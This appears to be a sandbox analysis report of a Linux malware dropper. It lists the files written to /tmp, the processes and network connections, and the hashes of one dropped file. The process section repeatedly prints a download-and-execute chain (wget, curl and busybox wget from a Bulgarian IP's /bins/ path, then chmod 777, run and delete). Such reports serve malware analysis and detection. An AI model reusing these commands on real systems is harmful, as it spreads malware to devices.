N/A /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI N/A
N/A /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ N/A
N/A /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr N/A
N/A /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs N/A
N/A /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 N/A
N/A /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 N/A
N/A /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ N/A
N/A /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K N/A
N/A /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE N/A
N/A /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce N/A
N/A /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl N/A
N/A /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ /usr/bin/curl N/A
File opened for modification /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 /usr/bin/curl N/A
File opened for modification /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 /usr/bin/curl N/A
File opened for modification /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs /usr/bin/curl N/A
File opened for modification /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K /usr/bin/curl N/A
File opened for modification /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl /usr/bin/curl N/A
File opened for modification /tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K /usr/bin/curl N/A
File opened for modification /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa /usr/bin/curl N/A
File opened for modification /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI /usr/bin/curl N/A
File opened for modification /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr /usr/bin/curl N/A
File opened for modification /tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI /usr/bin/curl N/A
File opened for modification /tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0 /usr/bin/curl N/A
File opened for modification /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE /usr/bin/curl N/A
File opened for modification /tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl /usr/bin/curl N/A
File opened for modification /tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ /usr/bin/curl N/A
File opened for modification /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 /usr/bin/curl N/A
File opened for modification /tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2 /usr/bin/curl N/A
File opened for modification /tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs /usr/bin/curl N/A
File opened for modification /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 /usr/bin/curl N/A
File opened for modification /tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8 /usr/bin/curl N/A
File opened for modification /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ /usr/bin/curl N/A
File opened for modification /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce /usr/bin/curl N/A
File opened for modification /tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2 /usr/bin/curl N/A
File opened for modification /tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce /usr/bin/curl N/A
File opened for modification /tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr /usr/bin/curl N/A
File opened for modification /tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa /usr/bin/curl N/A
File opened for modification /tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE /usr/bin/curl N/A
File opened for modification /tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ /usr/bin/curl N/A

Processes

/tmp/632f76d517064a74bbccd1d3b63b33a9aecb0ade5af65e6215aef5195573ac2e.sh

[/tmp/632f76d517064a74bbccd1d3b63b33a9aecb0ade5af65e6215aef5195573ac2e.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.126.196/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/bin/chmod

[chmod 777 cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE

[./cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/bin/rm

[rm cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/usr/bin/wget

[wget http://87.120.126.196/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/bin/chmod

[chmod 777 cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ

[./cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/bin/rm

[rm cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/usr/bin/wget

[wget http://87.120.126.196/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/bin/chmod

[chmod 777 mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K

[./mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/bin/rm

[rm mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/usr/bin/wget

[wget http://87.120.126.196/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/bin/chmod

[chmod 777 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8

[./4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/bin/rm

[rm 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/usr/bin/wget

[wget http://87.120.126.196/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/bin/chmod

[chmod 777 LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce

[./LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/bin/rm

[rm LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/usr/bin/wget

[wget http://87.120.126.196/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/bin/chmod

[chmod 777 ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl

[./ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/bin/rm

[rm ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/usr/bin/wget

[wget http://87.120.126.196/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/bin/chmod

[chmod 777 fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ

[./fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/bin/rm

[rm fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/usr/bin/wget

[wget http://87.120.126.196/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/bin/chmod

[chmod 777 XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2

[./XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/bin/rm

[rm XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/usr/bin/wget

[wget http://87.120.126.196/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/bin/chmod

[chmod 777 HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa

[./HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/bin/rm

[rm HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/usr/bin/wget

[wget http://87.120.126.196/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/bin/chmod

[chmod 777 ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI

[./ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/bin/rm

[rm ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/usr/bin/wget

[wget http://87.120.126.196/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/bin/chmod

[chmod 777 dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0

[./dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/bin/rm

[rm dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/usr/bin/wget

[wget http://87.120.126.196/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/bin/chmod

[chmod 777 Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr

[./Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/bin/rm

[rm Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/usr/bin/wget

[wget http://87.120.126.196/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/bin/chmod

[chmod 777 lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs

[./lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/bin/rm

[rm lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/usr/bin/wget

[wget http://87.120.126.196/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/bin/chmod

[chmod 777 VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2

[./VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/bin/rm

[rm VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/usr/bin/wget

[wget http://87.120.126.196/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/bin/chmod

[chmod 777 XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/tmp/XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2

[./XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/bin/rm

[rm XJJF4TP9BHVZKnfG3T1rgJlVX1zhsqZ1K2]

/usr/bin/wget

[wget http://87.120.126.196/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/bin/chmod

[chmod 777 HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/tmp/HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa

[./HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/bin/rm

[rm HNiaTI8j1saPfAqp1tVHxrYn23RQLXR5oa]

/usr/bin/wget

[wget http://87.120.126.196/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/bin/chmod

[chmod 777 ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/tmp/ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI

[./ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/bin/rm

[rm ZhhqH3yczO3XmKRS7uTgOcI3ZiLOYeG9kI]

/usr/bin/wget

[wget http://87.120.126.196/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/bin/chmod

[chmod 777 fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/tmp/fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ

[./fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/bin/rm

[rm fXGPsezckuNHiOpa31rtwvgAmwtlOuhueQ]

/usr/bin/wget

[wget http://87.120.126.196/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/bin/chmod

[chmod 777 Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/tmp/Ro25NvglcprnEiv0m414BdWCkdJh5icOKr

[./Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/bin/rm

[rm Ro25NvglcprnEiv0m414BdWCkdJh5icOKr]

/usr/bin/wget

[wget http://87.120.126.196/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/bin/chmod

[chmod 777 lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/tmp/lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs

[./lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/bin/rm

[rm lRTQPDkcFWZ5EhFAHAoDNHBMhZ7Ffuptrs]

/usr/bin/wget

[wget http://87.120.126.196/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/bin/chmod

[chmod 777 VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/tmp/VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2

[./VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/bin/rm

[rm VA74eIMjaAUOP65EfoEemqONvMKOfRZqG2]

/usr/bin/wget

[wget http://87.120.126.196/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/bin/chmod

[chmod 777 dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/tmp/dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0

[./dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/bin/rm

[rm dH3KrOJzPKMOWFQqpfk7Cty8FBWDvbvBQ0]

/usr/bin/wget

[wget http://87.120.126.196/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/bin/chmod

[chmod 777 cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/tmp/cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ

[./cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/bin/rm

[rm cJQhFjK9xTOfiGmQJfaBVT4N3M9O639PnZ]

/usr/bin/wget

[wget http://87.120.126.196/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/bin/chmod

[chmod 777 mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/tmp/mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K

[./mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/bin/rm

[rm mpfzXwY2P25evJqraXBaE9NRLSfKqVVd9K]

/usr/bin/wget

[wget http://87.120.126.196/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/bin/chmod

[chmod 777 cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE

[./cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/bin/rm

[rm cEMOveE67q8O5djPlyBYOVDZ034wfCXafE]

/usr/bin/wget

[wget http://87.120.126.196/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/bin/chmod

[chmod 777 LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/tmp/LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce

[./LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/bin/rm

[rm LRTftbiOKoSV5Nvzlgf5eW3MBbhMoXefce]

/usr/bin/wget

[wget http://87.120.126.196/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/bin/chmod

[chmod 777 ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/tmp/ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl

[./ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/bin/rm

[rm ij5TJ06YNXX0SwRzjzdZft7uIcehzou6jl]

/usr/bin/wget

[wget http://87.120.126.196/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/bin/chmod

[chmod 777 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/tmp/4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8

[./4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

/bin/rm

[rm 4Sex4nvXoeoxZJCLVi0NzROp32Lx3E2DP8]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
GB 185.125.188.61:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.1.91:443 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
US 151.101.1.91:443 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
GB 195.181.164.14:443 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp

Files

/tmp/cEMOveE67q8O5djPlyBYOVDZ034wfCXafE

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
